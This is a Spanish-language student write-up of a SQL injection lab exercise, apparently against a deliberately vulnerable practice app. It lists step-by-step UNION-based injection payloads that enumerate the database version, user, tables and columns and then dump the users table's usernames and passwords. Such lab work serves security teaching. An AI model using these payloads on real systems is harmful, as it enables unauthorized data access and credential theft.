La tarea 2 consiste en realiza una serie de pasos indicados para conocer las vulnerabilidades que ofrecen algunos desarrollos web en los cuales a través de una simple consulta se puede llegar a obtener información de la BD, tablas, datos, usuarios y claves.
Ahora el desarrollo de los pasos :
Paso 1:Simple consulta al registro N°1
Paso 2:Reemplazar la consulta por «%’ or ‘0’=’0», esto reemplaza la consulta en la BD obteniendo todos los registros de la tabla cambiando la condición de la consulta.
Paso 3: reemplazar el valor por «%’ or 0=0 union select null, version() #», de esta manera se obtiene la versión de la BD.
Paso 4:reemplazar el valor por «%’ or 0=0 union select null, user() #» de esta manera se obtiene el usuario conectado a la BD.
Paso 5:reemplazar el valor por «%’ or 0=0 union select null, database() #» de esta manera se obtiene el nombre de la BD.
Paso 6:reemplazar el valor por «%’ and 1=0 union select null, table_name from information_schema.tables #» de esta manera se obtiene la información de las tablas que contiene la BD.
Paso 7:reemplazar el valor por «%’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’#» se obtiene todas las tablas que contienen el texto user en su nombre.
Paso 8:reemplazar el valor por «%’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘users’ #» se obtienen todas las columnas de la tabla users.
Paso 9:reemplazar el valor por «%’ and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #» se obtiene los registros de la tabla users